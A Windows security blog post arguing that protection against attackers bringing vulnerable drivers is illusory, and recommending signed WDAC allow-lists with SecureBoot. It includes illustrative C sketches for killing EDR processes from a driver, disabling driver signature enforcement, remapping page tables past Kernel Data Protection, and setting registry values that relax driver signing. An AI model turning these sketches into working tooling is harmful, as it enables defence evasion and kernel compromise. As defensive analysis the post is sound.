For some reason, there’s a collective hallucination that Bring Your Own Vulnerable Driver (BYOVD) protection is a thing that’s achievable, and something that you should do. Let’s look into how this happened…
In 2020, Microsoft advertised Secured-core PCs, and included a curious statement:
Defending against these types of threats—whether those that live off the land by using what’s already on the machine or those that bring in vulnerable drivers as part of their attack chain—requires a fresh approach to security, one that combines threat defense on multiple levels: silicon, operating system, and cloud.
Secured-core PCs enable the full set of HVCI-provided exploit mitigations, but let’s look at the specifically troublesome part of that statement:
those that bring in vulnerable drivers
The message being conveyed is: If you buy a Secured-core PC, you can protect against attackers that bring their own vulnerable drivers. Let’s see if this statement is grounded in reality.
Why do attackers use drivers? There are several things that a driver can accomplish that an attacker might want, including (list courtesy Rapid7):
Disabling Driver Signature Enforcement (DSE)
Note: For reasons we will see, this one is a touch meta. That is, an attacker is bringing their own vulnerable driver to… bring their own driver?
In some cases, drivers that allow these things to happen may already be present on a system that is being attacked. If the driver is vulnerable, these actions may not even require admin privileges to pull off.
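To make that concrete, here’s an illustrative user-mode sketch of how any local user would talk to a driver whose device object is open to Everyone. The device name, IOCTL code, and request layout are made up for illustration; the point is only that if the driver itself hands out a dangerous primitive, no admin privileges are needed to use it.

```c
/*
 * Illustrative sketch: this is all it takes for any local user to talk to
 * a driver whose device object is open to Everyone.  The device name,
 * IOCTL code, and request layout are made up.
 */
#include <windows.h>
#include <winioctl.h>
#include <stdint.h>
#include <stdio.h>

/* Hypothetical request understood by the hypothetical driver. */
typedef struct {
    uint64_t KernelAddress;
    uint64_t Value;
} KERNEL_WRITE_REQUEST;

#define IOCTL_EXAMPLE_KERNEL_WRITE \
    CTL_CODE(FILE_DEVICE_UNKNOWN, 0x801, METHOD_BUFFERED, FILE_ANY_ACCESS)

int main(void)
{
    /* Opening the device succeeds for a non-admin user only if the driver's
     * device object grants access to unprivileged callers.                 */
    HANDLE dev = CreateFileW(L"\\\\.\\ExampleRw", GENERIC_READ | GENERIC_WRITE,
                             0, NULL, OPEN_EXISTING, 0, NULL);
    if (dev == INVALID_HANDLE_VALUE) {
        printf("open failed: %lu\n", GetLastError());
        return 1;
    }

    KERNEL_WRITE_REQUEST req = { 0, 0 };   /* placeholder address and value */
    DWORD bytes = 0;
    BOOL ok = DeviceIoControl(dev, IOCTL_EXAMPLE_KERNEL_WRITE,
                              &req, sizeof(req), NULL, 0, &bytes, NULL);
    printf("kernel write %s\n", ok ? "succeeded" : "failed");

    CloseHandle(dev);
    return 0;
}
```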
A vulnerable driver being present on a system can make an attacker’s life easier. But what about this “BYOVD” thing that I keep hearing about? Attackers are doing this in the wild, so it’s something we should worry about, right? Let’s look at some facts about the Windows driver world and how it affects attackers:
In order to bring a driver, an attacker must have admin privileges.
Microsoft does not consider administrator-to-kernel to be a security boundary.
To clarify what “administrator-to-kernel is not a security boundary” means, imagine that you have two drivers:
Driver A provides kernel memory read/write to all users.
Driver B provides kernel memory read/write to administrator users.
Driver A would be considered vulnerable because it allows non-administrator users to modify kernel memory. Driver B, on the other hand, is not considered vulnerable because it requires admin privileges to use. And because “administrator to kernel” is not a security boundary, abusing Driver B does not cross any security boundary, so there is no vulnerability at play.
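As a rough sketch of how small the difference between Driver A and Driver B can be in practice, consider the following incomplete kernel code. The device name is made up and the actual read/write IOCTL handling is omitted; the only relevant difference is the SDDL string that decides who may open the device.

```c
/*
 * Incomplete, illustrative sketch: the only difference between "Driver A"
 * and "Driver B" above is who is allowed to open the device that exposes
 * the kernel read/write IOCTLs.  Expressed with IoCreateDeviceSecure(),
 * that difference is just the SDDL string.
 */
#include <ntddk.h>
#include <wdmsec.h>   /* IoCreateDeviceSecure; link against wdmsec.lib */

/* Driver A: GENERIC_ALL for Everyone (WD).  Any local user can reach the
 * primitive, so this is what gets a driver labeled "vulnerable".        */
DECLARE_CONST_UNICODE_STRING(SddlEveryone, L"D:P(A;;GA;;;WD)");

/* Driver B: GENERIC_ALL only for SYSTEM (SY) and Administrators (BA).
 * Same primitive, admin-only access: per Microsoft's servicing criteria,
 * not a vulnerability.                                                   */
DECLARE_CONST_UNICODE_STRING(SddlAdminOnly, L"D:P(A;;GA;;;SY)(A;;GA;;;BA)");

NTSTATUS CreateRwDevice(PDRIVER_OBJECT DriverObject, BOOLEAN AdminOnly,
                        PDEVICE_OBJECT *DeviceObject)
{
    UNICODE_STRING name = RTL_CONSTANT_STRING(L"\\Device\\ExampleRw");

    /* The I/O manager applies the SDDL when a caller opens the device,
     * before any of the driver's IOCTL code ever runs.                  */
    return IoCreateDeviceSecure(DriverObject, 0, &name, FILE_DEVICE_UNKNOWN,
                                0, FALSE,
                                AdminOnly ? &SddlAdminOnly : &SddlEveryone,
                                NULL, DeviceObject);
}
```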
Attackers are indeed bringing vulnerable drivers in attacks occurring in the wild. Now, think about whether the “vulnerable” part of that statement matters. Remember to avoid logical fallacies in the process.
A vulnerable driver allows non-admin users to do dangerous things.
An attacker bringing their own driver already has admin privileges.
Given this, what does an attacker actually gain by bringing a vulnerable driver? If I were an attacker, I’d probably choose a driver that was not vulnerable, just to stay under the radar a touch more, rather than setting off alarm bells by using a driver that is known to be vulnerable.
For certain activities, an admin-privileged attacker can simply bring a non-vulnerable driver to achieve their goal.
If the goal is to kill a protected EDR process, an attacker can simply use a driver that exposes ZwTerminateProcess to admin users. If the driver only exposes ZwTerminateProcess to admin users, then it would not be considered a vulnerable driver. However, it’s allowing an admin-privileged attacker to do something that might be useful to them.
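A minimal sketch of what such a driver’s “kill process” path might look like is below. The IOCTL code and input format are invented for illustration, and restricting the device to administrators would be done via the device security descriptor, as in the earlier sketch.

```c
/*
 * Sketch of the "kill process" path of such a driver.  The IOCTL code is
 * invented; restricting access to administrators would be handled by the
 * device's SDDL, as in the previous sketch.  ZwOpenProcess and
 * ZwTerminateProcess are documented kernel routines, though some WDK
 * header sets may require you to supply prototypes.
 */
#include <ntddk.h>

#define IOCTL_KILL_PROCESS \
    CTL_CODE(FILE_DEVICE_UNKNOWN, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS)

static NTSTATUS KillProcessById(HANDLE ProcessId)
{
    OBJECT_ATTRIBUTES oa;
    CLIENT_ID cid = { ProcessId, NULL };
    HANDLE process;
    NTSTATUS status;

    InitializeObjectAttributes(&oa, NULL, OBJ_KERNEL_HANDLE, NULL, NULL);

    /* A kernel-mode open is not subject to the PP/PPL checks that stop
     * user-mode tools, which is why "EDR killer" drivers work at all.   */
    status = ZwOpenProcess(&process, PROCESS_TERMINATE, &oa, &cid);
    if (!NT_SUCCESS(status)) {
        return status;
    }

    status = ZwTerminateProcess(process, STATUS_SUCCESS);
    ZwClose(process);
    return status;
}
```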
An example ZwTerminateProcess driver that isn’t vulnerable is interesting, but the holy grail of proving that BYOVD protection is a lie would be to show that an admin-privileged attacker can load an unsigned or invalidly signed driver, or failing that, to show that an attacker can load a driver that has a valid signature but has not been approved by Microsoft. This would open up the attack to universally leverage anything that a driver can do.
KDU is a universal driver exploit tool that can leverage a driver with a kernel memory read/write primitive to achieve a number of useful goals, including the ability to disable Windows Driver Signature Enforcement (DSE). While the drivers that KDU comes with are generally considered “vulnerable” in that non-admin users can leverage their functionality, it’s important to realize that a non-vulnerable driver with the same read/write primitive can be used to achieve the same goal. And because KDU requires admin privileges to run, the use of a vulnerable driver is even less relevant.
For example, KDU can use the read/write primitive in rtcore64.sys to set the CiVariableAddress value, disabling driver signature enforcement in Windows.
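In the spirit of what KDU automates, a user-mode sketch of the “disable DSE” step looks something like the following. KernelWrite() is a stand-in for whatever arbitrary kernel write primitive the loaded driver exposes (vulnerable or not), and the caller is assumed to have already resolved the kernel address of the code integrity options variable; none of that plumbing is shown here.

```c
/*
 * User-mode sketch of the "disable DSE" step.  KernelWrite() is a
 * hypothetical stand-in for the kernel write primitive exposed by the
 * loaded driver, and ciOptionsVa is assumed to already hold the resolved
 * kernel address of the code integrity options variable.  That plumbing
 * (loading the driver, finding the address) is where tools like KDU do
 * their work.
 */
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical primitive provided by the helper driver. */
bool KernelWrite(uint64_t kernelAddress, const void *buffer, size_t size);

bool DisableDse(uint64_t ciOptionsVa)
{
    /* Writing 0 is the classic way to clear the enforcement flags so that
     * subsequently loaded drivers no longer need a valid signature.      */
    uint32_t disabled = 0;
    return KernelWrite(ciOptionsVa, &disabled, sizeof(disabled));
}
```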
If you attempt to disable DSE on an HVCI-enabled Windows system, you’ll get a different, unpleasant result: an ATTEMPTED_WRITE_TO_READONLY_MEMORY bugcheck.
Why is this? It’s not actually HVCI itself that provides this protection, but rather Kernel Data Protection (KDP). A naive attempt to write to a protected kernel memory location will fail, sometimes catastrophically (in a BSOD). Does this mean that an HVCI-enabled system will prevent an attacker from disabling the driver signature check?
The Microsoft article that introduces KDP makes a statement that is a clue to how its protections might be able to be bypassed:
KDP does not enforce how the virtual address range mapping a protected region is translated.
What this means is that while the original memory location might benefit from read-only memory permissions, an attacker can remap the memory by modifying the page tables, resulting in a mapping with read-write permissions. This remapping attack, and the HLAT feature intended to counter it, is described in “Intel VT-rp - Part 1. remapping attack and HLAT”.
Just as exploits over time adopted ROP to bypass the NX protection introduced by AMD, we can expect tools like KDU to eventually adopt memory remapping to bypass the protection added by KDP.
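To illustrate the idea (and only the idea), here is a heavily simplified sketch of such a remapping. Every helper function in it is hypothetical, and real code would additionally have to deal with the randomized PTE base, large pages, and TLB invalidation.

```c
/*
 * Heavily simplified sketch of the remapping idea: instead of writing to
 * the KDP-protected variable (which bugchecks), repoint its virtual
 * address at a different physical page that the attacker controls and has
 * pre-filled with a copy of the original data, CI options zeroed.  Every
 * helper below is hypothetical.
 */
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

bool     KernelRead(uint64_t va, void *buf, size_t size);
bool     KernelWrite(uint64_t va, const void *buf, size_t size);
uint64_t VirtualToPteVa(uint64_t va);       /* VA of the PTE mapping 'va'  */
bool     AllocateKernelPage(uint64_t *pfn); /* attacker page; outputs PFN  */

bool RemapCiOptions(uint64_t ciOptionsVa)
{
    uint64_t pteVa = VirtualToPteVa(ciOptionsVa);
    uint64_t pte, pfn;

    if (!KernelRead(pteVa, &pte, sizeof(pte)))
        return false;
    if (!AllocateKernelPage(&pfn))
        return false;

    /* Swap the page frame number (bits 12..51 of an x64 PTE) so the same
     * virtual address now resolves to the attacker's page.  KDP's
     * protection followed the original physical page, not this
     * translation, which is exactly the gap Microsoft's statement above
     * describes and that Intel VT-rp/HLAT aims to close.                */
    pte = (pte & ~0x000FFFFFFFFFF000ULL) | (pfn << 12);
    return KernelWrite(pteVa, &pte, sizeof(pte));
}
```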
So that’s it? We’ve proved that BYOVD protection is a lie, right?
Cisco Talos published a blog post, https://blog.talosintelligence.com/old-certificate-new-signature/, which describes a technique being used in the wild to bypass the requirement that Windows drivers be approved by the Microsoft Developer Portal.
Microsoft states: Starting with Windows 10, version 1607, Windows will not load any new kernel-mode drivers which are not signed by the Dev Portal.
The presumed goal here is to give Microsoft a certain amount of control over Windows drivers. Drivers that are blatantly malicious or vulnerable might not get approval from Microsoft, resulting in a driver that Windows will refuse to load by default.
But as the Talos blog post explains, the above policy appears to be more of an intended goal than a fact. Why? By playing games with a cross-signing certificate’s date, an attacker can get Windows to treat the driver under the pre-1607 policy, which does not require the Developer Portal signature.
This means that an attacker can load a malicious driver in Windows, as long as it has a valid signature, which can be accomplished by simply purchasing one, or by using a signing key that has been leaked, stolen, or otherwise made available to the attacker.
So there’s no need for a vulnerable driver when we can just use a malicious driver. That’s the final nail in the BYOVD protection coffin, right?
Sure, an attacker might play certificate games as outlined in the Talos blog post to get past the Developer Portal signing requirement. But since we’re talking about cases where the attacker already has admin privileges (they’re bringing a driver, after all), even this is over-thinking things. Why? An admin user can simply tell Windows to use the pre-1607 behavior.
As outlined in https://www.geoffchappell.com/notes/security/whqlsettings/index.htm, Windows can be reverted to a configuration where it does not require drivers to be signed by the Microsoft Developer Portal by setting the UpgradedSystem and BootUpgradedSystem registry values.
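For illustration only, a sketch of setting those two values with the Win32 registry API might look like the following. The registry key path and the DWORD data shown are assumptions on my part; consult the linked page for the authoritative location and semantics.

```c
/*
 * Sketch only: setting the two values named above with the Win32 registry
 * API.  The key path and the DWORD data of 1 are ASSUMPTIONS made for
 * illustration; see the linked Geoff Chappell page for the authoritative
 * details.  This requires admin privileges, which is exactly the point.
 */
#include <windows.h>

static BOOL UsePre1607SigningBehavior(void)
{
    /* ASSUMED location of the code integrity policy values. */
    const wchar_t *keyPath = L"SYSTEM\\CurrentControlSet\\Control\\CI\\Policy";
    const DWORD data = 1;   /* ASSUMED value data */
    HKEY key;
    LSTATUS rc;

    rc = RegOpenKeyExW(HKEY_LOCAL_MACHINE, keyPath, 0, KEY_SET_VALUE, &key);
    if (rc != ERROR_SUCCESS) {
        return FALSE;
    }

    /* The value names come from the article; ERROR_SUCCESS is 0, so OR-ing
     * the two results is a compact "did both succeed" check.             */
    rc  = RegSetValueExW(key, L"UpgradedSystem", 0, REG_DWORD,
                         (const BYTE *)&data, sizeof(data));
    rc |= RegSetValueExW(key, L"BootUpgradedSystem", 0, REG_DWORD,
                         (const BYTE *)&data, sizeof(data));
    RegCloseKey(key);
    return rc == ERROR_SUCCESS;
}
```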
How many nails does this BYOVD protection coffin need?
So you want to protect against BYOD (Bring Your Own Driver)? This is a laudable goal, and unlike BYOVD protection, an achievable one. However, as with just about anything security-related, achieving this improvement comes at the cost of increased maintenance.
Windows Defender Application Control (WDAC) can be used to control what applications and drivers Windows will allow to run. For example, the Microsoft recommended driver block rules policy that recent versions of Windows use to block vulnerable drivers is implemented as a WDAC policy.
This is a useful feature to prevent the presence of a vulnerable driver on a system before an attacker arrives. Note that this feature will not block an attacker that is in a position to attempt a BYOVD attack, though. Such an attacker already has admin privileges by nature of bringing their own driver, and an admin user of a Windows system can simply modify or disable WDAC settings to their liking.
WDAC settings can be made tamper resistant by using signed policies. Part of the deployment for signed WDAC policies is to deploy the signed policy into the system’s EFI partition. This type of WDAC deployment is tamper resistant by way of two behaviors:
If the WDAC policy file in the Windows filesystem is modified or removed, Windows will simply use the copy of the policy in the EFI partition.
If the WDAC policy file in the EFI partition is modified or removed, SecureBoot will fail to boot Windows.
If a Windows system is to be protected against BYOD attacks, a WDAC policy must be created that only allows the set of drivers that have been approved for use on that system. That is, the WDAC policy must provide a specific “allow list” of drivers that may be loaded. Note that the Microsoft recommended driver block rules policy includes an “Allow All” rule (a fact noted on the Microsoft recommended driver block rules page itself), so that list by itself is not sufficient to protect against BYOD attacks.
The WDAC policy that specifies which drivers are allowed to load must also be signed before being deployed to both Windows and the EFI partition. Once this signed WDAC deployment is complete, Windows should prevent an attacker from being able to bring their own driver.
Years ago, Microsoft mentioned that their Secured-core PCs would protect against BYOVD attacks. As time has passed, this hallucination has propagated to the masses. Aiming to block BYOVD attacks, however, is simply not currently a viable goal. Preventing attackers from loading arbitrary drivers is a reasonable goal, which can be accomplished with the combination of SecureBoot and a signed WDAC policy. Without this combination of protections, it should be assumed that an admin-privileged attacker can load whatever drivers they want.
Advertising BYOVD protection is disingenuous, as any attacker that’s bringing a driver already has admin privileges, and as such they don’t need to bother with using a vulnerable driver.
Secured-core PCs are a good idea from a security perspective, with their HVCI and associated KDP features. However, even Secured-core PCs cannot truthfully advertise BYOD (note the lack of “V”) protection. BYOD protection can be accomplished by way of a signed WDAC policy that is maintained and deployed to the systems that are to be protected. Such protection does not reach the masses simply because they use a Secured-core PC running standard Windows 11.